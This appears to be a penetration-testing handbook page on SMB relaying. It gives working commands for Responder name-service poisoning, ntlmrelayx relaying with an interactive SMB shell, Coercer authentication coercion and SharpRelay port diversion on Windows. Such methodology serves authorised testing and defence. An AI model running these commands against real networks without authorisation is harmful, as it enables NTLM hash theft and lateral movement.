Syslifters Handbook

English

Deutsch

English

Deutsch

Appearance

SMB relaying

Prerequisites for SMB relaying (external link)

Methodology

To relay to SMB, we have the following tools at our disposal:

  • Responder to poison NetBIOS, LLMNR and MDNS to retrieve NTLM hashes to either crack them offline or use them for NTLM relaying (our Windows version).
  • ntlmrelayx to relay incoming traffic to other hosts and protocols and spawn e.g. an SMB shell.
  • SharpRelay, or our version to divert traffic destined for SMB to another port on a Windows machine. Useful, when we want to use Responder or ntlmrelayx on a Windows machine.
  • Coercer to coerce other hosts to initiate a connection.

You can use Respotter in your environment to detect active poisoning.

sh
# Install responder
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

# Run responder, deactivate the builtin smb and http server in Responder.conf
sudo python3 Responder.py -I eth0

# Run ntlmrelayx to relay to targets listed in targets.txt
python ./examples/ntlmrelayx.py -smb2support -tf targets.txt -i

# Optionally, coerce other hosts to our attacker machine
python -m coercer coerce -u {username} -p {password} -t {ip}

On Windows you can build our version. To use it, you also need SharpRelay (Syslifters version) and place the Responder.conf next to the executable. This way, we get NTLM hashes directly into Responder.

powershell
# Run SharpRelay in a dedicated process (requires admin)
SharpRelay.exe svcname C:\\Path\\To\\WinDivert64.sys 445 8445

# Run Responder to discover NTLM hashes (or poison MDNS for more results)
Responder.exe -I Ethernet

SharpRelay

To enable relaying on Windows hosts, we can use SharpRelay. This will divert incoming traffic to another local port using WinDivert. Admin access is required.

Syslifters version

The absolute path must be used when specifying the driver, e.g.:

powershell
SharpRelay.exe mynewservice C:\\Path\\To\\WinDivert64.sys 445 8445
powershell
python ./examples/ntlmrelayx.py -smb2support --smb-port 8445 \"-t\" smb://10.0.0.3
powershell
python -m coercer coerce -u {username} -p {password} -t {ip}

ntlmrelayx troubleshooting

When installing ntlmrelayx via pipx or other means, you may need the following cryptography and pyOpenSSL versions:

powershell
pip install cryptography==41.0.7
pip install pyOpenSSL==23.2.0